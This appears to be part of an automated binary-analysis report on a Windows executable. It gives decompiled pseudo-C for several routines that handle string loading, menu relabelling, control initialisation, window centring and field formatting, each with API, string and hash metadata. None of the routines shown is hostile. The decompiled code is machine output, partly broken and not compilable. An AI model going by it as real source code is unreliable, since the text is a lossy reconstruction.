				if(( *(_t97 + 0x40) & 0x00004000) == 0) {
					_push(L"FALSE");
				} else {
					_push(L"TRUE");
				}
				E004063DD(_t34, _t81, _t91, _t107);
				E004063DD(_t99, _t81, _t91, _t107);
				_t82 =  *((intOrPtr*)(_t97 + 0x14));
				_t39 = E00406306(0x412320,  *((intOrPtr*)(_t97 + 0x14)));
				_t108 = _t39;
				if(_t39 == 0) {
					_t39 = 0x40f454;
				}
				E004063DD(_t99, _t82, _t91, _t108, _t39);
				E004063DD(_t99, _t82, _t91, _t108, _t78);
				_t109 =  *(_t97 + 0x40) & 0x00000001;
				_t44 = L"TRUE";
				if(( *(_t97 + 0x40) & 0x00000001) == 0) {
					_t44 = L"FALSE";
				}
				E004063DD(_t99, _t82, _t91, _t109, _t44);
				E004063DD(_t99, _t82, _t91, _t109, _t78);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v88.wYear = 0x7b2;
				_v88.wDay = 1;
				_v88.wMonth = 1;
				SystemTimeToFileTime( &_v88,  &_v96);
				_t90 = _v96.dwLowDateTime;
				asm("sbb ecx, edi");
				_t56 = E0040E380( *((intOrPtr*)(_t97 + 0x30)) - _t90,  *((intOrPtr*)(_t97 + 0x34)), 0x989680, 0);
				_push(_t90);
				_push(_t56);
				_push(L"%I64d");
				_push(0x1f);
				_push( &_v88);
				L0040DFD6();
				_t96 = _v20;
				_t60 = E004063DD( &_v88 | 0xffffffff,  *((intOrPtr*)(_t97 + 0x34)), _v20, _t109,  &_v88);
				_t80 = "\t";
				E004063DD(_t60 | 0xffffffff,  *((intOrPtr*)(_t97 + 0x34)), _v20, _t109, "\t");
				_t85 =  *((intOrPtr*)(_t97 + 0x18));
				_t64 = E00406306(0x412320,  *((intOrPtr*)(_t97 + 0x18)));
				_t110 = _t64;
				if(_t64 == 0) {
					_t64 = 0x40f454;
				}
				E004063DD(E004063DD(_t64 | 0xffffffff, _t85, _t96, _t110, _t64) | 0xffffffff, _t85, _t96, _t110, _t80);
				_t86 =  *((intOrPtr*)(_t97 + 0x1c));
				_t70 = E00406306(0x412320,  *((intOrPtr*)(_t97 + 0x1c)));
				_t111 = _t70;
				if(_t70 == 0) {
					_t70 = 0x40f454;
				}
				return E004063DD(E004063DD(_t70 | 0xffffffff, _t86, _t96, _t111, _t70) | 0xffffffff, _t86, _t96, E004063DD(_t70 | 0xffffffff, _t86, _t96, _t111, _t70) | 0xffffffff, L"\r\n");
			}

0x0040228c
0x0040228c
0x00402295
0x0040229e
0x004022a5
0x004022aa
0x004022ac
0x004022ac
0x004022ae
0x004022b1
0x004022b7
0x004022c0
0x004022c0
0x004022c8
0x004022cd
0x004022d5
0x004022da
0x004022e0
0x004022e2
0x004022eb
0x004022e4
0x004022e4
0x004022e4
0x004022f0
0x004022f8
0x004022fd
0x00402305
0x0040230a
0x0040230c
0x0040230e
0x0040230e
0x00402316
0x0040231e
0x00402323
0x00402327
0x0040232c
0x0040232e
0x0040232e
0x00402336
0x0040233e
0x00402349
0x0040234a
0x0040234b
0x0040234c
0x00402358
0x0040235f
0x00402366
0x0040236d
0x0040238d
0x00402399
0x0040239d
0x004023a2
0x004023a3
0x004023a4
0x004023ad
0x004023af
0x004023b0
0x004023b5
0x004023c7
0x004023cc
0x004023d5
0x004023da
0x004023e4
0x004023e9
0x004023eb
0x004023ed
0x004023ed
0x004023ff
0x00402404
0x00402409
0x0040240e
0x00402410
0x00402412
0x00402412
0x00402433

APIs

SystemTimeToFileTime.KERNEL32(0040F608,0040F454,0040F608,TRUE,0040F608), ref: 0040236D
__aulldiv.LIBCMT ref: 0040239D
_snwprintf.MSVCRT ref: 004023B0

Part of subcall function 004063DD: wcslen.MSVCRT ref: 004063F9
Part of subcall function 004063DD: memcpy.MSVCRT ref: 0040641C

Strings

FALSE, xrefs: 004022EB, 0040232E, 00402333
%I64d, xrefs: 004023A4
TRUE, xrefs: 004022E4, 00402327
#A, xrefs: 00402299
#A, xrefs: 004023DD
#A, xrefs: 00402300

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$FileSystem__aulldiv_snwprintfmemcpywcslen
String ID: #A$ #A$ #A$%I64d$FALSE$TRUE
API String ID: 1007903050-2074899967
Opcode ID: b9360966ef7f6412c30b58f45b026677565554216b57faebb1f3e34bdffda112
Instruction ID: 8e4ed6724c6830059bb234df0f7beb71b8df579462f7a4d2eaf4f2db12cb8827
Opcode Fuzzy Hash: b9360966ef7f6412c30b58f45b026677565554216b57faebb1f3e34bdffda112
Instruction Fuzzy Hash: 9041B5613002042BD260BE7A9D45A1B7299AF94318B014A3FBD66F76D3DBBCE81D4369

Uniqueness

Uniqueness Score: -1.00%

Function 00406827, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00406827(signed short __ebx) {
				signed int _t21;
				void* _t22;
				intOrPtr _t23;
				struct HINSTANCE__* _t25;
				signed int _t27;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				void* _t35;
				signed short _t39;
				signed int _t40;
				signed int _t42;
				intOrPtr _t43;
				signed int _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t49;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				void* _t57;
				int _t61;
				void* _t62;
				int _t71;
				void* _t72;
				void* _t73;

				_t39 = __ebx;
				if( *0x413288 == 0) {
					E00406785();
				}
				_t40 =  *0x413280; // 0x18
				_t21 = 0;
				if(_t40 <= 0) {
					L5:
					_t57 = 0;
				} else {
					while(1) {
						_t55 =  *0x413278; // 0x6c7120
						if(_t39 ==  *((intOrPtr*)(_t55 + _t21 * 4))) {
							break;
						}
						_t21 = _t21 + 1;
						if(_t21 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t52 =  *0x41327c; // 0x6c7528
					_t53 =  *0x413270; // 0x2100048
					_t57 = _t53 +  *(_t52 + _t21 * 4) * 2;
				}
				L6:
				if(_t57 != 0) {
					L21:
					_t22 = _t57;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x412c38 == 0) {
							_t23 =  *0x413290; // 0x1000
							_push(_t23 - 1);
							_push( *0x413274);
							_push(_t39);
							_t25 = E0040698D();
							goto L15;
						} else {
							wcscpy(0x412e48, L"strings");
							_t35 = E00406D16(_t39,  *0x413274);
							_t62 = _t62 + 0x10;
							if(_t35 == 0) {
								L13:
								_t25 = GetModuleHandleW(0);
								_t46 =  *0x413290; // 0x1000
								_push(_t46 - 1);
								_push( *0x413274);
								_push(_t39);
								goto L15;
							} else {
								_t61 = wcslen( *0x413274);
								if(_t61 == 0) {
									goto L13;
								}
							}
						}
					} else {
						_t25 = GetModuleHandleW(_t57);
						_t49 =  *0x413290; // 0x1000
						_push(_t49 - 1);
						_push( *0x413274);
						_push(_t39 & 0x0000ffff);
						L15:
						_t61 = LoadStringW(_t25, ??, ??, ??);
						_t71 = _t61;
					}
					if(_t71 <= 0) {
						L20:
						_t22 = 0x40f454;
					} else {
						_t27 =  *0x413284; // 0xcd
						_t10 = _t61 + 2; // 0xcf
						_t72 = _t27 + _t10 -  *0x413288; // 0x8000
						if(_t72 >= 0) {
							goto L20;
						} else {
							_t42 =  *0x413280; // 0x18
							_t73 = _t42 -  *0x41328c; // 0x100
							if(_t73 >= 0) {
								goto L20;
							} else {
								_t43 =  *0x413270; // 0x2100048
								_t57 = _t43 + _t27 * 2;
								_t14 = _t61 + 2; // 0x2
								memcpy(_t57,  *0x413274, _t61 + _t14);
								_t30 =  *0x413280; // 0x18
								_t44 =  *0x413284; // 0xcd
								_t54 =  *0x41327c; // 0x6c7528
								 *(_t54 + _t30 * 4) = _t44;
								_t31 =  *0x413280; // 0x18
								_t45 =  *0x413278; // 0x6c7120
								 *(_t45 + _t31 * 4) = _t39;
								_t32 =  *0x413284; // 0xcd
								 *0x413280 =  *0x413280 + 1;
								 *0x413284 = _t32 + _t61 + 1;
								if(_t57 != 0) {
									goto L21;
								} else {
									goto L20;
								}
							}
						}
					}
				}
				return _t22;
			}

0x00406827
0x0040682e
0x00406830
0x00406830
0x00406835
0x0040683c
0x00406841
0x00406853
0x00406853
0x00406843
0x00406843
0x00406843
0x0040684c
0x00000000
0x00000000
0x0040684e
0x00406851
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406851
0x00406880
0x00406889
0x0040688f
0x0040688f
0x00406855
0x00406857
0x00406988
0x00406988
0x0040685d
0x00406863
0x0040689c
0x004068eb
0x004068f1
0x004068f2
0x004068f8
0x004068f9
0x00000000
0x0040689e
0x004068a8
0x004068b4
0x004068b9
0x004068be
0x004068d2
0x004068d4
0x004068da
0x004068e1
0x004068e2
0x004068e8
0x00000000
0x004068c0
0x004068cb
0x004068d0
0x00000000
0x00000000
0x004068d0
0x004068be
0x00406865
0x00406866
0x0040686c
0x00406873
0x00406874
0x0040687d
0x004068fe
0x00406905
0x00406907
0x00406907
0x00406909
0x00406981
0x00406981
0x0040690b
0x0040690b
0x00406910
0x00406914
0x0040691a
0x00000000
0x0040691c
0x0040691c
0x00406922
0x00406928
0x00000000
0x0040692a
0x0040692a
0x00406930
0x00406933
0x0040693f
0x00406944
0x00406949
0x0040694f
0x00406955
0x00406958
0x0040695d
0x00406963
0x00406966
0x0040696e
0x0040697a
0x0040697f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040697f
0x00406928
0x0040691a
0x00406909
0x0040698c

APIs

GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
wcscpy.MSVCRT ref: 004068A8

Part of subcall function 00406D16: memset.MSVCRT ref: 00406D29
Part of subcall function 00406D16: _itow.MSVCRT ref: 00406D37

wcslen.MSVCRT ref: 004068C6
GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
memcpy.MSVCRT ref: 0040693F

Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 004067BF
Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 004067DD
Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 004067FB
Part of subcall function 00406785: ??2@YAPAXI@Z.MSVCRT ref: 00406819

Strings

(ul, xrefs: 00406880, 0040694F
ql, xrefs: 00406843, 0040695D
strings, xrefs: 0040689E

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
String ID: ql$(ul$strings
API String ID: 3166385802-1705666481
Opcode ID: c72559ebadd3ea1b83e8afb84d1d37b4e66ec646cef112fd2340ea135da12479
Instruction ID: b83127d2a15bee255c74f42c5a27ad94469461630f4946f0f4b43b8e5d041769
Opcode Fuzzy Hash: c72559ebadd3ea1b83e8afb84d1d37b4e66ec646cef112fd2340ea135da12479
Instruction Fuzzy Hash: 1641B375200102AFDB14FF18ED849B673A1F754306711C1FEE806B76A1DB7AAA22CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040699E, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101
windowCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E0040699E(void* __ecx, void* __eflags, int _a4, struct tagMENUITEMINFOW _a8, intOrPtr _a12, int _a24, intOrPtr _a28, wchar_t* _a44, intOrPtr _a48, long _a56, void _a58, short _a8256, void _a8258) {
				wchar_t* _v0;
				int _v4;
				int _t39;
				wchar_t* _t49;
				void* _t51;
				int _t67;
				intOrPtr _t68;
				signed int _t70;
				signed int _t71;

				_t59 = __ecx;
				_t71 = _t70 & 0xfffffff8;
				E0040E340(0x404c, __ecx);
				_t39 = GetMenuItemCount(_a8.cbSize);
				_a4 = _t39;
				_v4 = 0;
				if(_t39 <= 0) {
					L15:
					return _t39;
				} else {
					do {
						memset( &_a58, 0, 0x2000);
						_t71 = _t71 + 0xc;
						_a44 =  &_a56;
						_a8.cbSize = 0x30;
						_a12 = 0x36;
						_a48 = 0x1000;
						_a56 = 0;
						if(GetMenuItemInfoW(_a8.cbSize, _v4, 1,  &_a8) == 0) {
							goto L14;
						}
						if(_a56 == 0) {
							L12:
							_t80 = _a28;
							if(_a28 != 0) {
								_push(0);
								_push(_a28);
								_push(_a4);
								E0040699E(_t59, _t80);
								_t71 = _t71 + 0xc;
							}
							goto L14;
						}
						_t67 = _a24;
						_a8256 = 0;
						memset( &_a8258, 0, 0x2000);
						_t49 = wcschr( &_a56, 9);
						_t71 = _t71 + 0x14;
						_v0 = _t49;
						if(_a28 != 0) {
							if(_a12 == 0) {
								 *0x412c34 =  *0x412c34 + 1;
								_t68 =  *0x412c34; // 0x0
								_t67 = _t68 + 0x11558;
								__eflags = _t67;
							} else {
								_t67 = _v4 + 0x11171;
							}
						}
						_t51 = E00406D16(_t67,  &_a8256);
						_pop(_t59);
						if(_t51 != 0) {
							if(_v0 != 0) {
								wcscat( &_a8256, _v0);
								_pop(_t59);
							}
							ModifyMenuW(_a8, _v4, 0x400, _t67,  &_a8256);
						}
						goto L12;
						L14:
						_v4 = _v4 + 1;
						_t39 = _v4;
					} while (_t39 < _a4);
					goto L15;
				}
			}

0x0040699e
0x004069a1
0x004069a9
0x004069b4
0x004069be
0x004069c2
0x004069c6
0x00406af3
0x00406af9
0x004069cc
0x004069d1
0x004069d8
0x004069dd
0x004069e4
0x004069f3
0x004069fe
0x00406a06
0x00406a0e
0x00406a1b
0x00000000
0x00000000
0x00406a26
0x00406acb
0x00406acb
0x00406acf
0x00406ad1
0x00406ad2
0x00406ad6
0x00406ad9
0x00406ade
0x00406ade
0x00000000
0x00406acf
0x00406a2c
0x00406a3a
0x00406a42
0x00406a4e
0x00406a53
0x00406a5a
0x00406a5e
0x00406a63
0x00406a71
0x00406a77
0x00406a7d
0x00406a7d
0x00406a65
0x00406a69
0x00406a69
0x00406a63
0x00406a8c
0x00406a94
0x00406a95
0x00406a9b
0x00406aa9
0x00406aaf
0x00406aaf
0x00406ac5
0x00406ac5
0x00000000
0x00406ae1
0x00406ae1
0x00406ae5
0x00406ae9
0x00000000
0x004069d1

APIs

GetMenuItemCount.USER32 ref: 004069B4
memset.MSVCRT ref: 004069D8
GetMenuItemInfoW.USER32 ref: 00406A13
memset.MSVCRT ref: 00406A42
wcschr.MSVCRT ref: 00406A4E
wcscat.MSVCRT ref: 00406AA9
ModifyMenuW.USER32(?,?,00000400,?,?), ref: 00406AC5

Strings

6, xrefs: 004069FE
0, xrefs: 004069F3

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
String ID: 0$6
API String ID: 4066108131-3849865405
Opcode ID: 89f899f7243dee98bcbd5a103440f16ff97d5f32f15a1ba4fc358b67112b384b
Instruction ID: b215381df5749c23a569ed6f67112db3caf5a45f0159d48b34fa9b4edc30ae2f
Opcode Fuzzy Hash: 89f899f7243dee98bcbd5a103440f16ff97d5f32f15a1ba4fc358b67112b384b
Instruction Fuzzy Hash: D731AFB2508344AFCB209F91C84099BB7E8EF84314F04893EFA49A2291D775D914CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00402754, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52
libraryloaderwindowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00402754(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryW(L"comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}

0x00402761
0x00402768
0x0040276f
0x00402771
0x00402779
0x0040277d
0x004027a7
0x004027a7
0x004027af
0x004027b0
0x004027b5
0x004027d2
0x004027b7
0x004027c4
0x004027cd
0x004027cd
0x004027b5
0x00402785
0x0040278d
0x00402793
0x00402796
0x00402796
0x00402799
0x004027a1
0x00000000
0x004027a3
0x004027a3
0x00000000
0x004027a3

APIs

LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402773
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00402785
FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402799
#17.COMCTL32(?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 004027A7
MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004027C4

Strings

InitCommonControlsEx, xrefs: 0040277F
Error: Cannot load the common control classes., xrefs: 004027BE
Error, xrefs: 004027B9
comctl32.dll, xrefs: 0040275C

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadMessageProc
String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
API String ID: 2780580303-317687271
Opcode ID: 8b95306214ac587ba0897fcd046ca2e4eeea29109f78b8f4090a977e67bd8f40
Instruction ID: 71d6d288c8c0cbb2a230865f183c91b33313cb8a4c206b23d80a388f73b59e38
Opcode Fuzzy Hash: 8b95306214ac587ba0897fcd046ca2e4eeea29109f78b8f4090a977e67bd8f40
Instruction Fuzzy Hash: 0B01D1763612116BD3315BB49D8DB7F7AD8EB81759B10403AF502F36C0EAB8C90982AD

Uniqueness

Uniqueness Score: -1.00%

Function 00405B17, Relevance: 15.1, APIs: 10, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00405B17(void* __edx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t50;
				long _t61;
				struct HDC__* _t63;
				intOrPtr _t65;
				intOrPtr _t68;
				struct HWND__* _t71;
				intOrPtr _t72;
				void* _t73;
				int _t74;
				int _t80;
				int _t83;

				_t73 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t74 = GetSystemMetrics(0x11);
				_t80 = GetSystemMetrics(0x10);
				if(_t74 == 0 || _t80 == 0) {
					_t63 = GetDC(0);
					_t80 = GetDeviceCaps(_t63, 8);
					_t74 = GetDeviceCaps(_t63, 0xa);
					ReleaseDC(0, _t63);
				}
				GetWindowRect(_a4,  &_v44);
				if((_a8 & 0x00000004) != 0) {
					_t71 = GetParent(_a4);
					if(_t71 != 0) {
						_v28.left = _v28.left & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						GetWindowRect(_t71,  &_v28);
						_t61 = _v28.left;
						_t72 = _v28.top;
						_t80 = _v28.right - _t61 + 1;
						_t74 = _v28.bottom - _t72 + 1;
						_v8 = _t61;
						_v12 = _t72;
					}
				}
				_t65 = _v44.right;
				if((_a8 & 0x00000001) == 0) {
					asm("cdq");
					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
				} else {
					_t83 = 0;
				}
				_t68 = _v44.bottom;
				if((_a8 & 0x00000002) != 0) {
					L11:
					_t50 = 0;
					goto L12;
				} else {
					asm("cdq");
					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
					if(_t50 >= 0) {
						L12:
						if(_t83 < 0) {
							_t83 = 0;
						}
						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
					}
					goto L11;
				}
			}

0x00405b17
0x00405b2a
0x00405b2d
0x00405b34
0x00405b3a
0x00405b3c
0x00405b4f
0x00405b59
0x00405b60
0x00405b62
0x00405b62
0x00405b75
0x00405b7b
0x00405b86
0x00405b8a
0x00405b8c
0x00405b95
0x00405b96
0x00405b97
0x00405b9d
0x00405b9f
0x00405ba5
0x00405baf
0x00405bb0
0x00405bb1
0x00405bb4
0x00405bb4
0x00405b8a
0x00405bbb
0x00405bbe
0x00405bcd
0x00405bd4
0x00405bc0
0x00405bc0
0x00405bc0
0x00405bdb
0x00405bde
0x00405bf3
0x00405bf3
0x00000000
0x00405be0
0x00405be9
0x00405bee
0x00405bf1
0x00405bf5
0x00405bf7
0x00405bf9
0x00405bf9
0x00405c16
0x00405c16
0x00000000
0x00405bf1

APIs

GetSystemMetrics.USER32 ref: 00405B30
GetSystemMetrics.USER32 ref: 00405B36
GetDC.USER32(00000000), ref: 00405B43
GetDeviceCaps.GDI32(00000000,00000008), ref: 00405B54
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00405B5B
ReleaseDC.USER32 ref: 00405B62
GetWindowRect.USER32 ref: 00405B75
GetParent.USER32(?), ref: 00405B80
GetWindowRect.USER32 ref: 00405B9D
MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00405C0C

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
String ID:
API String ID: 2163313125-0
Opcode ID: 62d34707e84acb0b8d4d630ad042eb52563104a98599b23053d4d9526d36ec3e
Instruction ID: 16e951d772d83260d2b373081c0788c8dcba8c3ecadbacc9f3e1e8367de9e11c
Opcode Fuzzy Hash: 62d34707e84acb0b8d4d630ad042eb52563104a98599b23053d4d9526d36ec3e
Instruction Fuzzy Hash: F6316072900619AFDB10CFB8CD85AEEBBB8EB48314F054179E901F7290DA75BD458F94

Uniqueness

Uniqueness Score: -1.00%

Function 00401ED6, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 176
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00401ED6(signed int __ecx, void* __edx, intOrPtr* _a4) {
				char _v516;
				char _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				void _v546;
				char _v548;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				intOrPtr _v576;
				int _v580;
				short _v582;
				void _v584;
				intOrPtr _v588;
				signed int _v592;
				signed int _v596;
				wchar_t* _v600;
				signed int _v604;
				intOrPtr _v624;
				char _v632;
				void* __ebx;
				void* __edi;
				signed int _t73;
				signed int _t74;
				signed int _t76;
				signed int _t97;
				signed int _t104;
				int _t124;
				intOrPtr _t126;
				signed int _t127;
				void* _t131;
				intOrPtr* _t151;
				signed int _t153;
				void* _t156;
				void* _t157;

				_t134 = __ecx;
				_v592 = __ecx;
				_v584 = 0;
				_v582 = 0;
				_v580 = 0;
				_v588 = 0x40f634;
				_t73 = memset( &_v584, 0, 0x44);
				_t126 =  *0x41235c; // 0x0
				_t151 = _a4;
				_t74 = _t73 | 0xffffffff;
				_t156 = (_t153 & 0xfffffff8) - 0x254 + 0xc;
				_v572 = _t74;
				_v568 = _t74;
				_v564 = _t74;
				_v560 = _t74;
				_t127 = _t126 - 1;
				_v520 = 0;
				_v600 =  *((intOrPtr*)(_t151 + 0x28));
				if(_t127 < 0) {
					L3:
					_t127 = _t127 | 0xffffffff;
				} else {
					while(1) {
						_t124 = wcscmp(_v600, E00406306(0x412340, _t127));
						_pop(_t134);
						if(_t124 == 0) {
							goto L4;
						}
						_t127 = _t127 - 1;
						if(_t127 >= 0) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
				}
				L4:
				if(_t127 != 0xffffffff) {
					_t76 = _t127;
				} else {
					_t76 = E00406264(0x412340, _t134, _v600);
				}
				_v556 = _t76;
				_v524 =  *((intOrPtr*)(_t151 + 0x2c));
				_v548 =  *_t151;
				_v544 =  *((intOrPtr*)(_t151 + 4));
				_v540 =  *((intOrPtr*)(_t151 + 8));
				_v536 =  *((intOrPtr*)(_t151 + 0xc));
				_v532 =  *((intOrPtr*)(_t151 + 0x10));
				_t129 = _v592 + 0x84c;
				_v528 =  *((intOrPtr*)(_t151 + 0x14));
				_v596 = _v592 + 0x84c;
				E00406434(_v592 + 0x84c,  *((intOrPtr*)(_t151 + 0x20)), 0xffffffff, 0);
				_v580 = E00406264(0x412320, _t134, E0040636E(_t129));
				E00406434(_t129,  *((intOrPtr*)(_t151 + 0x24)), 0xffffffff, 0);
				_v592 = E00406264(0x412320, _t134, E0040636E(_t129));
				_t131 = _v624 + 0x860;
				 *((intOrPtr*)(_t131 + 0x1c)) = 0;
				 *((intOrPtr*)(_t131 + 4)) = 0;
				_v632 = 0;
				_v548 = 0;
				memset( &_v546, 0, 0x1fe);
				_t97 = E0040610D(_t134,  &_v632,  &_v548, 0xff,  *((intOrPtr*)(_t151 + 0x1c)), ".", 0);
				_t157 = _t156 + 0x20;
				while(_t97 != 0) {
					E00406264(_t131, _t134,  &_v516);
					_t97 = E0040610D(_t134,  &_v604,  &_v520, 0xff,  *((intOrPtr*)(_t151 + 0x1c)), ".", 0);
					_t157 = _t157 + 0x14;
				}
				E0040637A(_t97 | 0xffffffff, _v596, 0x40f454);
				_t104 = _v596;
				_v604 = _v604 & 0x00000000;
				if( *((intOrPtr*)(_t104 + 0x87c)) > 0) {
					do {
						if(_v600 != 0) {
							_t166 = _t104 | 0xffffffff;
							E004063DD(_t104 | 0xffffffff, _t134, _v596, _t104 | 0xffffffff, ".");
						}
						E004063DD(E00406306(_t131,  *((intOrPtr*)(_v592 + 0x87c)) - _v600 - 1) | 0xffffffff,  *((intOrPtr*)(_v592 + 0x87c)) - _v600 - 1, _v596, _t166, _t116);
						_v604 = _v604 + 1;
						_t104 = _v596;
						_t134 = _v604;
					} while (_v604 <  *((intOrPtr*)(_t104 + 0x87c)));
				}
				_v576 = E00406264(0x412320, _t134, E0040636E(_v596));
				_v576 = E00406264(0x412320, _t134,  *((intOrPtr*)(_t151 + 0x18)));
				return E00408603( &(_v600[0xffffffffffffff2d]),  &_v596, _t134);
			}

0x00401ed6
0x00401eef
0x00401ef3
0x00401ef8
0x00401efd
0x00401f01
0x00401f09
0x00401f0e
0x00401f14
0x00401f17
0x00401f1a
0x00401f1d
0x00401f21
0x00401f25
0x00401f29
0x00401f30
0x00401f33
0x00401f37
0x00401f3b
0x00401f5c
0x00401f5c
0x00000000
0x00401f3d
0x00401f4e
0x00401f56
0x00401f57
0x00000000
0x00000000
0x00401f59
0x00401f5a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00401f5a
0x00401f3d
0x00401f5f
0x00401f62
0x00401f74
0x00401f64
0x00401f6d
0x00401f6d
0x00401f7a
0x00401f81
0x00401f87
0x00401f8e
0x00401f95
0x00401f9c
0x00401fa9
0x00401fb0
0x00401fb6
0x00401fba
0x00401fbe
0x00401fdb
0x00401fdf
0x00401fff
0x00402007
0x0040200f
0x00402012
0x00402015
0x00402019
0x0040201e
0x0040203a
0x0040203f
0x00402070
0x0040204b
0x00402068
0x0040206d
0x0040206d
0x00402080
0x00402085
0x00402089
0x00402095
0x00402097
0x0040209c
0x004020a7
0x004020aa
0x004020aa
0x004020cd
0x004020d2
0x004020d6
0x004020da
0x004020de
0x00402097
0x004020ff
0x0040210a
0x00402126

APIs

memset.MSVCRT ref: 00401F09
wcscmp.MSVCRT ref: 00401F4E
memset.MSVCRT ref: 0040201E

Strings

@#A, xrefs: 00401F3F
#A, xrefs: 00401FEC
